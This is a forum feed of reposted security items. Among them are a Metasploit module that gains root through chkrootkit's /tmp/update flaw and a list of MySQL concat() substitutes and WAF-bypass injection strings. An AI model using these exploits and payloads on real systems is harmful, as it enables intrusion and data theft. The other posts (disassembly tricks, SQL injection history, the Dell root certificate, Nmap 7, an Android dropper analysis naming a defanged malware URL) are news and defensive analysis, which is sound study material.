Everything posted by Nytro

  1. Anti-Disassembly techniques used by malware (a primer)

Rahul Nair | 22 Nov 2015

There are chances that malware authors implement some kind of trolling so that a malware analyst has a hard time figuring out code during static analysis (IDA Pro?). Implementing these cunning asm instructions will not cause any issues to the flow of the program but will confuse static analysis tools such as IDA Pro from interpreting the code correctly.

Once upon a time there were 2 kinds of disassembly algorithms: linear disassembly and flow-oriented disassembly. The former was used in tutorials / nobody gives a damn / is not used that much in disassemblers. What we are concerned about is the latter, which is used in IDA Pro and sometimes gamed by malware authors.

1. Jump Instructions to a location with constant value

This is the most used trick by malware writers/anti-disassembly programs, which create jumps into the same location + 1 or 2 bytes. It would lead to interpretation of completely different byte code by the system. For instance the actual jump instance here would take the flow of program to the bytecode mentioned above. Since tools like IDA Pro are not that clever (no offense to the creator) it cannot make such judgements and instead interprets the opcode from E8, which shows us a bunch of call instructions to some random crappy address, weird decrements and adds. Now we can fix this with ease in IDA Pro. Do that by pressing D on the E8 and the C key on the 8B opcode and voila! you get what is actually being interpreted.

After playing around more with the C & D keys you get the following in IDA which seems legit. Now what has happened here is that the author might have inserted something known as a rogue byte which confuses IDA Pro, leading to a wrong interpretation of the rest of the opcode. This is a simple technique and if you don't like to see that ugly E8 byte you could NOP it out.

2. Jump Instructions to the Same target

IDA Pro usually follows this behavior where for a conditional instruction (jnz) it first disassembles the false branch of the conditional instruction and then moves forward to the true part. From a malware POV, since both the jz and jnz are present it is similar to an unconditional jump. Once IDA Pro reaches the jz instruction it would first branch out and interpret the false instruction and move on to jnz where it would do the same. A nice and dirty trick is to insert a rogue byte code and make the disassembler interpret the instructions as a call. If we do the C & D thingy in IDA Pro as mentioned in 1. we get the following code.

3. Ping-Pong jumps

I have no idea what this technique is named as but it involves doing a lot of jumping around using the method mentioned in 1. and maybe even a bit of 2. Let's look at this innocent jump below. This jump goes back to loc_4012E6+2 which would be the EB opcode. If we ignore the 66 and B8 opcodes and make IDA interpret the rest as code instead we get the following. Yay, more jumps. Once again ignoring the other E8 byte and considering the rest as code the result is as follows. We can see how incorporating rogue bytes obscures the real function call from being hidden in static analysis.

4. Usage of Function Pointers

Instead of a screen shot here is a piece of code:

```asm
mov     [ebp+var_8], offset sub_4211C1
push    4Ah
call    [ebp+var_8]
```

What happens above is that a function is called via use of a reference to an address. For example for the function call it would get the function string name by the use of some weird bunch of decoding subroutine and save the value in an offset sub_4211C1. This would make static analysis really hard since IDA won't recognize it easily. From a static analysis point of view though it doesn't seem to cause massive harm, this coupled with other anti-disassembly techniques can lead to annoyance for an analyst.

There are a couple more annoying techniques which I will explore in another post such as abusing the return pointer (for fun and profit :P), using your own Structured Exception Handler (SEH) and screwing around with the stack-frame construction in IDA Pro.

Sursa: Anti-Disassembly techniques used by malware (a primer)
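The disagreement between the two disassembly styles the post opens with, and the overlap that a rogue E8 byte creates, can be reproduced in a few dozen lines. The following is an added example (not the article's code): a toy x86-32 decoder for a handful of one-byte opcodes, run once as a linear sweep and once as a flow-oriented (recursive traversal) pass. The two byte strings are constructed to mirror techniques 1 and 2 above and are not the article's samples. The part an analyst actually wants is the overlap list: two decoded instructions sharing bytes is something a compiler never emits, so it is a cheap triage signal for anti-disassembly.

```python
"""Minimal x86-32 decoder for a handful of one-byte opcodes, written to show
how a 'rogue byte' (an E8 placed right after a jump, as in techniques 1 and 2
of the post) makes a linear sweep and a flow-oriented disassembler disagree.
Added example; the opcode subset and the sample byte strings are constructed
for illustration and are not taken from the article's screenshots."""
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def decode_one(code, addr):
    """Decode the instruction starting at addr.

    Returns (length, text, successors) where successors are the addresses
    control may flow to next, or None when the opcode is outside the small
    supported subset or the instruction would run past the end of the buffer.
    """
    op = code[addr]
    rest = len(code) - addr
    if op == 0x90:
        return 1, "nop", [addr + 1]
    if op == 0xC3:
        return 1, "ret", []
    if 0x40 <= op <= 0x47:
        return 1, f"inc {REGS[op - 0x40]}", [addr + 1]
    if 0x48 <= op <= 0x4F:
        return 1, f"dec {REGS[op - 0x48]}", [addr + 1]
    if op in (0xEB, 0x74, 0x75) and rest >= 2:
        # short jumps: target is relative to the end of the 2-byte instruction
        nxt = addr + 2
        target = nxt + struct.unpack_from("<b", code, addr + 1)[0]
        if op == 0xEB:
            return 2, f"jmp short {target:#06x}", [target]
        name = "jz" if op == 0x74 else "jnz"
        return 2, f"{name} short {target:#06x}", [nxt, target]
    if op == 0xE8 and rest >= 5:
        # call rel32: the classic rogue byte, it swallows the next four bytes
        # as a displacement whatever they really are
        target = addr + 5 + struct.unpack_from("<i", code, addr + 1)[0]
        return 5, f"call {target:#x}", [addr + 5, target]
    if 0xB8 <= op <= 0xBF and rest >= 5:
        imm = struct.unpack_from("<I", code, addr + 1)[0]
        return 5, f"mov {REGS[op - 0xB8]}, {imm:#x}", [addr + 5]
    return None


def linear_sweep(code):
    """Decode byte after byte from offset 0, never looking at control flow.
    Returns {addr: (length, text)}."""
    listing, addr = {}, 0
    while addr < len(code):
        dec = decode_one(code, addr)
        length, text = (1, f"db {code[addr]:#04x}") if dec is None else dec[:2]
        listing[addr] = (length, text)
        addr += length
    return listing


def flow_oriented(code, entry=0):
    """Recursive traversal: decode only what control flow can reach.

    Returns (listing, overlaps).  overlaps holds (inner_addr, outer_addr)
    pairs where one decoded instruction starts inside another; legitimate
    compiler output never does this, so any overlap is a strong indicator of
    anti-disassembly tricks and worth flagging during triage.
    """
    listing, overlaps, work = {}, [], [entry]
    while work:
        addr = work.pop()
        if addr in listing or not 0 <= addr < len(code):
            continue
        dec = decode_one(code, addr)
        length, text, succ = (1, f"db {code[addr]:#04x}", []) if dec is None else dec
        for start, (slen, _) in listing.items():
            if start < addr < start + slen:       # we start inside an earlier one
                overlaps.append((addr, start))
            elif addr < start < addr + length:    # an earlier one starts inside us
                overlaps.append((start, addr))
        listing[addr] = (length, text)
        work.extend(succ)
    return listing, overlaps


def texts(listing):
    """Human-readable listing in address order."""
    return [f"{a:#06x}: {t}" for a, (_, t) in sorted(listing.items())]


# Constructed samples (not from the article):
# technique 1: jmp over a single rogue E8 byte onto 'inc eax; ret'
JMP_OVER_ROGUE_BYTE = bytes.fromhex("EB 01 E8 40 C3 90 90 90")
# technique 2: jz/jnz to the same target, rogue E8 sitting in the dead gap
JZ_JNZ_SAME_TARGET = bytes.fromhex("74 03 75 01 E8 40 C3 90 90")

if __name__ == "__main__":
    for name, sample in [("jmp over rogue byte", JMP_OVER_ROGUE_BYTE),
                         ("jz/jnz same target", JZ_JNZ_SAME_TARGET)]:
        flow, overlaps = flow_oriented(sample)
        print(f"== {name}: linear sweep ==")
        print(*texts(linear_sweep(sample)), sep="\n")
        print(f"== {name}: flow-oriented ==")
        print(*texts(flow), sep="\n")
        print("overlapping instructions:", overlaps)
```

In the first sample the linear sweep never shows `inc eax; ret`, because the E8 eats them as a call displacement, while the flow-oriented pass lands on them directly. In the second sample the flow-oriented pass reaches both the real code (through the jz/jnz targets) and the rogue E8 (through the jnz fall-through), and the overlap list records that the bogus call covers two instruction starts. That is exactly the situation the post resolves by hand with the C and D keys; an automated pass can at least raise the flag.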
  2. Microsoft Makes Windows 10 Automatic Spying Worse

Microsoft has been on a roll lately. Its massive Windows 10 update ‘Threshold 2’ has far more good features than bad ones, the ‘free upgrade’ rules have been improved and even Microsoft’s Black Friday 2015 deals are surprisingly great. But a new discovery has been made which isn’t good news – at all…

Earlier this month Microsoft finally went on record admitting that automatic spying within Windows 10 cannot be stopped. This sparked a lot of outrage and with ‘Threshold 2’ it appeared Microsoft had done a sharp U-turn because the background service at the heart of tracking (the ‘Diagnostics Tracking Service’ aka ‘DiagTrack’) appeared to have been removed. Critics celebrated and it was another well deserved pat on the back for Microsoft.

Except it turns out Microsoft had just been very sneaky. What Tweakhound discovered and was subsequently confirmed by BetaNews, is Microsoft simply renamed DiagTrack. It is now called the ‘Connected User Experiences and Telemetry Service’ – which is both a) deliberately vague, and b) misleading (don’t ‘Connected User Experiences’ sound great).

Windows 10 prior to the Threshold 2 update shows ‘Diagnostics Tracking Service’. Image credit: Tweakhound

Even sneakier is, in being renamed, Microsoft also reset users’ preferences. Those who dug deep into the Windows 10 registry to disable DiagTrack will find it has been re-enabled now it is called the Connected User Experiences and Telemetry Service. Yes, tracking is back and without any warning and your preferences were irrelevant.

The good news is you can disable the Connected User Experiences and Telemetry Service the same way as DiagTrack:

  • Hold down the Windows key and tap the R key
  • In the box that opens type ‘services.msc’ and press the Enter key
  • In the ‘Services (Local)’ section locate ‘Connected User Experiences and Telemetry’ and double-click it
  • In the ‘Service status’ section click ‘Stop’
  • Under the ‘Startup type’ drop down menu select ‘Disabled’ and then confirm this and close the window by clicking ‘OK’

Note: it is advisable to disable, not delete, the service. Deleting it can cause problems.

Windows 10 prior to the Threshold 2 update shows ‘Connected User Experiences And Telemetry’ which executes the exact same service as DiagTrack. Image credit: Tweakhound

So what is Microsoft thinking here? I’ve reached out to the company but, despite recognising my enquiry, it has yet to issue a statement. I’ll update this post when it does. While Microsoft thinks about what to say, I’d say the problem with the DiagTrack rebrand is the company wasn’t thinking. Subtle under the hood changes will always be picked up for such a high profile product.

That said such a move is consistent with the negatives in Threshold 2, namely: it resets many user preferences (including basics like your preferred web browser) if they weren’t Microsoft products/services, as well as silently deleting third party system monitoring apps like: CPU-Z, speccy, 8gadgetpack, SpyBot, HWMonitor and more.

In my opinion it is this kind of overriding desire for control and a disregard for user choices which is harming Windows 10. At its core Windows 10 is a modern and highly capable platform, but it has been buried under ludicrous layers of control. Worse still it has created a two tier customer base where consumers are forced to take updates which businesses can delay, effectively turning everyday users into bug testers for corporations.

It all feels unsavoury and unnecessary and (while it could be coincidence) there has been a dramatic slowdown in Windows 10 growth after an explosive beginning. For the first ever free version of Windows, that’s not great. How can Microsoft reignite the love for Windows 10? I’d say a good start would be to stop doing daft things like this…

Sursa: http://www.forbes.com/sites/gordonkelly/2015/11/24/windows-10-automatic-spying-begins-again/
  3. HTTPS is OK (it also depends on you). HTTP is not OK. Tor Browser is OK (it also depends on you). Mozilla with a Tor proxy is not OK. https://hackertarget.com/tor-exit-node-visualization/
  4. [h=1]Chkrootkit Local Privilege Escalation[/h]

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local
  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chkrootkit Local Privilege Escalation',
      'Description'    => %q{
        Chkrootkit before 0.50 will run any executable file named
        /tmp/update as root, allowing a trivial privsec. WfsDelay is set to
        24h, since this is how often a chkrootkit scan is scheduled by
        default.
      },
      'Author'         => [
        'Thomas Stangner',        # Original exploit
        'Julien "jvoisin" Voisin' # Metasploit module
      ],
      'References'     => [
        ['CVE', '2014-0476'],
        ['OSVDB', '107710'],
        ['EDB', '33899'],
        ['BID', '67813'],
        ['CWE', '20'],
        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
      ],
      'DisclosureDate' => 'Jun 04 2014',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Privileged'     => true,
      'Stance'         => Msf::Exploit::Stance::Passive,
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
    ))

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')
    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')
    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end
end
```

Sursa: https://www.exploit-db.com/exploits/38775/
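As a defender-side counterpart to the module's `check` method, the two conditions it relies on, a chkrootkit release older than 0.50 and an executable `/tmp/update` that the cron-driven scan would run as root, are what a host audit should look for. The following is an added example and not part of the exploit-db module; the banner format and the path are taken from the module's `check` and `exploit` methods, the numeric version comparison and the file classification are constructed here.

```python
"""Audit checks for the two conditions the module above relies on
(CVE-2014-0476): a chkrootkit release before 0.50 and an executable
/tmp/update that a cron-driven scan would run as root.  Added example, not
part of the exploit-db module; the banner format and the path are taken from
the module's check/exploit methods, the rest is constructed here."""
import os
import re
import stat

FIXED_VERSION = (0, 50)   # first release that no longer executes /tmp/update


def parse_chkrootkit_version(banner):
    """Extract (major, minor) from the output of `chkrootkit -V`, or None."""
    m = re.search(r"chkrootkit version (\d+)\.(\d+)", banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_vulnerable_version(banner):
    """Numeric comparison against 0.50 rather than a regex on the digits."""
    v = parse_chkrootkit_version(banner)
    return v is not None and v < FIXED_VERSION


def describe_update_entry(mode, uid, path="/tmp/update"):
    """Classify an lstat() result for the update file.  Returns a finding
    string when the entry is something a scan could execute, else None."""
    if stat.S_ISLNK(mode):
        return f"{path}: symlink (uid {uid})"
    if stat.S_ISREG(mode) and mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        return (f"{path}: executable file owned by uid {uid}, "
                f"mode {stat.S_IMODE(mode):04o}")
    return None


def check_update_file(tmp_dir="/tmp"):
    """Look for tmp_dir/update on this host and classify it."""
    path = os.path.join(tmp_dir, "update")
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    return describe_update_entry(st.st_mode, st.st_uid, path)


if __name__ == "__main__":
    banner = "chkrootkit version 0.49"   # constructed banner for the demo
    print("version vulnerable:", is_vulnerable_version(banner))
    print("update file finding:", check_update_file())
```

Run it from the same cron job that runs chkrootkit, before the scan, and alert on any non-None finding; on a patched host the version check is what makes the finding informational rather than urgent.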
  5. WRITTEN BY JOSEPH COX, November 20, 2015 // 08:00 AM EST

One of the hackers suspected of being behind the TalkTalk breach, which led to the personal details of at least 150,000 people being stolen, used a vulnerability discovered two years before he was even born.

That method of attack was SQL injection (SQLi), where hackers typically enter malicious commands into forms on a website to make it churn out juicy bits of data. It's been used to steal the personal details of World Health Organization employees, grab data from the Wall Street Journal, and hit the sites of US federal agencies.

“It’s the most easy way to hack,” the pseudonymous hacker w0rm, who was responsible for the Wall Street Journal hack, told Motherboard. The attack took only a “few hours.”

But, for all its simplicity, as well as its effectiveness at siphoning the digital innards of corporations and governments alike, SQLi is relatively easy to defend against. So why, in 2015, is SQLi still leading to some of the biggest breaches around?

SQLi was possibly first documented by Jeff Forristal in the hacker zine Phrack. Back then, Forristal went by the handle rain.forest.puppy, but he's now CTO of mobile security at cybersecurity vendor Bluebox security.

“According to Microsoft, what you're about to read is not a problem, so don't worry about doing anything to stop it.”

SQL, or Structured Query Language, is a programming language used to manage databases. In essence, it's used when a website needs to call up a piece of information from its database, either to process it or present it to a user. But Forristal had found that typing certain commands would force a server to reveal information stored on it. “People can possibly piggyback SQL commands,” he wrote.

In the December 1998 issue of Phrack, Forristal wrote about a series of issues with a version of Microsoft SQL server. When Forristal's fellow researcher told Microsoft of the problems, “their answer was, well, hilarious,” he wrote. “According to them, what you're about to read is not a problem, so don't worry about doing anything to stop it.”

Today, over 15 years after it was first publicly disclosed, SQLi repeatedly sits at the number one spot of vulnerabilities in the OWASP Top 10 report, which is released every three years by the Open Web Application Security Project (OWASP) Foundation, a non-profit that monitors the threats that websites face.

Phrack's current logo. Image: Phrack

“SQL injection is always the number one risk. That is a reflection of just how many incidents are out there, as well as other factors that keep it very high up there,” Troy Hunt, founder of breach site haveibeenpwned.com, told Motherboard in a phone interview.

“When you go to a webpage, and you make a request, that parses part of the data in the request back to a server,” Hunt said. “For example, you read a news article, and the news article, in the address bar it has, “id=1”, and that gives you news article number 1, and then you get another one with ID 2.”

But, “with a SQLi attack, an attacker changes that ID in the address bar to something that forces the database to do something it's not meant to do,” Hunt said, such as returning a piece of private data.

An individual attack might just return one piece or section of info, so an attacker is likely to “repeat it over and over and over again, as many times as is necessary, so they get every piece of data from the database,” Hunt said.

Naturally, that's going to be quite time consuming. So, a hacker might use tools that automate the process instead. Those include Havij, which “is popular amongst script kiddies as it's for Windows and has a [graphical user interface],” Mustafa Al-Bassam, a security researcher and former LulzSec hacker, told Motherboard in an online chat. Another commonly used piece of software is sqlmap.

“It crawls the pages on the website, similar to how a search engine crawler might, looks for input forms on the website, and submits the forms with inputs that might cause a MySQL syntax error,” Al-Bassam added.

When the attacker is looking for a target to hit in the first place, that's just as simple to automate too.

Image: sqlmap

“They would use Google to search for URLs that are known to be typically associated with scripts that are vulnerable to SQL injection,” Al-Bassam said. “They would typically have a script that goes through all the URLs and tests them automatically to see if they're vulnerable.”

“You could teach a 4-year-old to do it,” Al-Bassam added, summing up how incredibly easy the whole process is. Indeed, Hunt has uploaded a video of him teaching his 3-year-old son how to carry out an SQLi attack with Havij. “You put the URL in, here's all the data out,” Hunt told Motherboard. There are also ample on how to carry out an SQLi attack.

The thing is, there are solutions ready to be deployed by website developers to stop SQLi attacks and the unnecessary leaking of customers' data or corporate details. And those solutions have been around for years. One of those is the adoption of "prepared statements": when SQL commands controlling the database can’t be directly dictated by a user’s input.

If the solutions are fairly straight forward, why are SQLi-based attacks still happening?

“The benefit of prepared statements is that they set the semantics of a query so that any incoming data can’t surprise the developer by including syntax that changes a query intended to retrieve a single row into a query that extracts data from arbitrary tables,” Mike Shema, senior manager, software development engineer from Yahoo!, told Motherboard in an email.

Another is to “use SQL libraries that take care of input sanitization for them,” Al-Bassam suggested. This, in short, scrubs any data entered by the user to remove any potential malicious parts of it.

So, if SQLi is so easy that literally a child could do it, and the solutions are fairly straight forward, why are SQLi-based attacks still happening?

“Any serious programmer should know about SQLi, but there's a massive shortage of programmers, so companies hire anyone even if they don't have the right training or experience to mitigate basic vulnerabilities,” Al-Bassam suggested. On top of this, “they're often put under pressure by their managers to develop functional software rather than secure software.”

Shema from Yahoo! echoed this, and said that “Sometimes small apps with a narrow feature set just need to be written quickly,” meaning that the developers might bypass some of the mitigations for each attack, despite them being relatively straight forward to implement.

Hunt was slightly less forgiving, and didn't agree that it was because of pressure from higher management. Instead, he lamented about the large number of tutorials available to web developers online that, instead of providing decent advice, detail how to make systems that are vulnerable to SQLi. "I've seen multiple tutorials come up this year that have got blatant SQL injection risks in them,” he said.

So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.

Ultimately, the responsibility for the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer.

Sursa: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away
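The contrast the article draws between a query built from the address-bar value and a prepared statement, run against an in-memory SQLite database. This is an added example, not the article's; the `articles` table and its rows are constructed, and the tampered `id=` value stands in for the kind of change Hunt describes. The third function shows the allow-list validation that belongs in front of the prepared statement in a real handler.

```python
"""The two query styles the article contrasts, side by side on an in-memory
SQLite database.  Added example, not from the article; the table and its rows
are constructed.  The vulnerable function builds SQL by string concatenation
from the 'id=' value; the safe one binds the value through a placeholder so
it is compared as data and can never be parsed as SQL syntax."""
import sqlite3


def make_db():
    """Throwaway database with a few news articles (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", [
        (1, "Public story", "visible to everyone"),
        (2, "Embargoed story", "not yet published"),
        (3, "Draft", "internal notes"),
    ])
    return conn


def article_vulnerable(conn, article_id):
    """String concatenation: whatever arrives in 'id=' becomes part of the SQL."""
    sql = "SELECT id, title FROM articles WHERE id = " + str(article_id) + " ORDER BY id"
    return conn.execute(sql).fetchall()


def article_prepared(conn, article_id):
    """Prepared statement: the value is bound separately and compared as data."""
    sql = "SELECT id, title FROM articles WHERE id = ? ORDER BY id"
    return conn.execute(sql, (article_id,)).fetchall()


def is_valid_article_id(value):
    """Allow-list check: the 'id=' parameter should only ever carry digits."""
    return str(value).isdigit()


def article_validated(conn, article_id):
    """Defence in depth: reject non-numeric ids before they reach the
    database, then still go through the prepared statement."""
    if not is_valid_article_id(article_id):
        raise ValueError(f"article id must be numeric, got {article_id!r}")
    return article_prepared(conn, int(article_id))


if __name__ == "__main__":
    db = make_db()
    tampered = "1 OR 1=1"   # constructed stand-in for a modified address bar
    print("vulnerable:", article_vulnerable(db, tampered))   # every row comes back
    print("prepared:  ", article_prepared(db, tampered))     # no row matches
    try:
        article_validated(db, tampered)
    except ValueError as err:
        print("validated: ", err)
```

With the tampered value the concatenated query turns `WHERE id = 1` into `WHERE id = 1 OR 1=1` and returns the embargoed and draft rows too; the prepared statement compares the integer column with the literal string and returns nothing, which is the "semantics are fixed" property Shema describes.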
  6. Superfish 2.0: Dangerous Certificate on Dell Laptops breaks encrypted HTTPS Connections

tl;dr Dell laptops come preinstalled with a root certificate and a corresponding private key. That completely compromises the security of encrypted HTTPS connections. I've provided an online check, affected users should delete the certificate.

It seems that Dell hasn't learned anything from the Superfish scandal earlier this year: Laptops from the company come with a preinstalled root certificate that will be accepted by browsers. The private key is also installed on the system and has been published now. Therefore attackers can use Man in the Middle attacks against Dell users to show them manipulated HTTPS webpages or read their encrypted data.

The certificate, which is installed in the system's certificate store under the name "eDellRoot", gets installed by a software called Dell Foundation Services. This software is still available on Dell's webpage. According to the somewhat unclear description from Dell it is used to provide "foundational services facilitating customer serviceability, messaging and support functions".

The private key of this certificate is marked as non-exportable in the Windows certificate store. However this provides no real protection, there are tools to export such non-exportable certificate keys. A user of the platform Reddit has posted the key there.

For users of the affected laptops this is a severe security risk. Every attacker can use this root certificate to create valid certificates for arbitrary web pages. Even HTTP Public Key Pinning (HPKP) does not protect against such attacks, because browser vendors allow locally installed certificates to override the key pinning protection. This is a compromise in the implementation that allows the operation of so-called TLS interception proxies.

I was made aware of this issue a while ago by Kristof Mattei. We asked Dell for a statement two weeks ago and didn't get any answer.

It is currently unclear which purpose this certificate served. However it seems unlikely that it was placed there deliberately for surveillance purposes. In that case Dell wouldn't have installed the private key on the system.

Affected are only users that use browsers or other applications that use the system's certificate store. Among the common Windows browsers this affects Internet Explorer, Edge and Chrome. Not affected are Firefox users, Mozilla's browser has its own certificate store.

Users of Dell laptops can check if they are affected with an online check tool. Affected users should immediately remove the certificate in the Windows certificate manager. The certificate manager can be started by clicking "Start" and typing in "certmgr.msc". The "eDellRoot" certificate can be found under "Trusted Root Certificate Authorities".

This incident is almost identical with the Superfish incident. Earlier this year it became public that Lenovo had preinstalled a software called Superfish on its laptops. Superfish intercepts HTTPS connections to inject ads. It used a root certificate for that and the corresponding private key was part of the software. After that incident several other programs with the same vulnerability were identified, they all used a software module called Komodia. Similar vulnerabilities were found in other software products, for example in Privdog and in the ad blocker Adguard.

This article is mostly a translation of a German article I wrote for Golem.de. Image source and license: Wistula / Wikimedia Commons, Creative Commons by 3.0

Sursa: https://blog.hboeck.de/archives/876-Superfish-2.0-Dangerous-Certificate-on-Dell-Laptops-breaks-encrypted-HTTPS-Connections.html
  7. mysql injection concat() replacements

@sergey_lakantar

```sql
select export_set(1,version(),user(),' : ',2);
-- 5.1.7 : my_user
select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
-- 5.1.7 : my_user : my_db

select make_set(7,version(),user(),schema());
-- 5.1.7,my_user,my_db
select replace(make_set(7,version(),user(),schema()),',',' : ');
-- 5.1.7 : my_user : my_db

select insert(insert(version(),length(version())--1,0,user()),length(version())--1,0,' : ');
-- 5.1.7 : my_user
select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()),length(version())--1,0,' : ')),length(schema())--1,0,' : ');
-- 5.1.7 : my_user : my_db

select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
-- 5.1.7 : my_user
select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
-- 5.1.7 : my_user : my_db

select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version());
-- 5.1.7 : my_user
select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
-- 5.1.7 : my_user : my_db

select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
-- 5.1.7 : my_user
select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
-- 5.1.7 : my_user : my_db
```

group_concat() without comma:

```sql
select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
-- 5.1.7 : my_user : my_db
```

concat() waf bypass:

```
/*!50000group_coNcat(*/)
/*!50000coNcat(*/)
`coNcat`%0a%0b%0c%0d%a0()
{snoopdogg concat()}
{s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
concat-- a%0a()
concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
concat/**x**/()
```

Modsecurity:

```
concat+()
```

Link: concat() replacements - Pastebin.com
  8. Nmap 7 Released

November 19, 2015

The Nmap Project is pleased to announce the immediate, free availability of the Nmap Security Scanner version 7.00 from https://nmap.org/. It is the product of three and a half years of work, nearly 3200 code commits, and more than a dozen point releases since the big Nmap 6 release in May 2012. Nmap turned 18 years old in September this year and celebrates its birthday with 171 new NSE scripts, expanded IPv6 support, world-class SSL/TLS analysis, and more user-requested features than ever. We recommend that all current users upgrade.

Contents: About Nmap | Top 7 Improvements in Nmap 7 | Press | Screen Shots | Detailed Improvements | Moving Forward (Future Plans) | Acknowledgments | Download and updates

Top 7 Improvements in Nmap 7

Before we get into the detailed changes, here are the top 7 improvements in Nmap 7:

1. Major Nmap Scripting Engine (NSE) Expansion

As the Nmap core has matured, more and more new functionality is developed as part of our NSE subsystem instead. In fact, we've added 171 new scripts and 20 libraries since Nmap 6. Examples include firewall-bypass, supermicro-ipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is now powerful enough that scripts can take on core functions such as host discovery (dns-ip6-arpa-scan), version scanning (ike-version, snmp-info, etc.), and RPC grinding (rpc-grind). There's even a proposal to implement port scanning in NSE. [More Details]

2. Mature IPv6 support

IPv6 scanning improvements were a big item in the Nmap 6 release, but Nmap 7 outdoes them all with full IPv6 support for CIDR-style address ranges, Idle Scan, parallel reverse-DNS, and more NSE script coverage. [More Details]

3. Infrastructure Upgrades

We may be an 18-year-old project, but that doesn't mean we'll stick with old, crumbling infrastructure! The Nmap Project continues to adopt the latest technologies to enhance the development process and serve a growing user base. For example, we converted all of Nmap.Org to SSL to reduce the risk of trojan binaries and reduce snooping in general. We've also been using the Git version control system as a larger part of our workflow and have an official Github mirror of the Nmap Subversion source repository and we encourage code submissions to be made as Github pull requests. We also created an official bug tracker which is also hosted on Github. Tracking bugs and enhancement requests this way has already reduced the number which fall through the cracks. [More Details]

4. Faster Scans

Nmap has continually pushed the speed boundaries of synchronous network scanning for 18 years, and this release is no exception. New Nsock engines give a performance boost to Windows and BSD systems, target reordering prevents a nasty edge case on multihomed systems, and NSE tweaks lead to much faster -sV scans. [More Details]

5. SSL/TLS scanning solution of choice

Transport Layer Security (TLS) and its predecessor, SSL, are the security underpinning of the web, so when big vulnerabilities like Heartbleed, POODLE, and FREAK come calling, Nmap answers with vulnerability detection NSE scripts. The ssl-enum-ciphers script has been entirely revamped to perform fast analysis of TLS deployment problems, and version scanning probes have been tweaked to quickly detect the newest TLS handshake versions. [More Details]

6. Ncat Enhanced

We are excited and proud to announce that Ncat has been adopted by the Red Hat/Fedora family of distributions as the default package to provide the "netcat" and "nc" commands! This cooperation has resulted in a lot of squashed bugs and enhanced compatibility with Netcat's options. Also very exciting is the addition of an embedded Lua interpreter for creating simple, cross-platform daemons and traffic filters.

7. Extreme Portability

Nmap is proudly cross-platform and runs on all sorts of esoteric and archaic systems. But our binary distributions have to be kept up-to-date with the latest popular operating systems. Nmap 7 runs cleanly on Windows 10 all the way back to Windows Vista. By popular request, we even built it to run on Windows XP, though we suggest those users upgrade their systems. Mac OS X is supported from 10.8 Mountain Lion through 10.11 El Capitan. Plus, we updated support for Solaris and AIX. And Linux users—you have it easy.

Link: https://nmap.org/7/
  9. [h=3]Android malware drops Banker from PNG file[/h]

Nowadays malware is trying to hide wherever it is possible to get under the radar of anti-virus companies. Lately I found a Trojan dropper carrying a malicious payload, encoded by Base64, embedded inside an image file. It’s nothing special these days but it is a very rare dropping technique. In most cases malware authors are lazy enough to not even encrypt the payload file.

[h=3]Analysis[/h]

At the time of writing this blog post this Trojan dropper is still available to download from the attacker's server (hxxp://jackdojacksgot.ru/img/Update.apk). Based on VirusTotal, detection for this Trojan dropper is very poor.

[Figure 1: VirusTotal detection]

This malicious application masquerades itself as Adobe Flash Player. Based on alternative names I found in application resources, the malware name can be different in other versions, like: Viber New, App4porno, CommBank, My Online Security, Viber or Whatsapp.

[Figure 2: Possible Trojan dropper names]

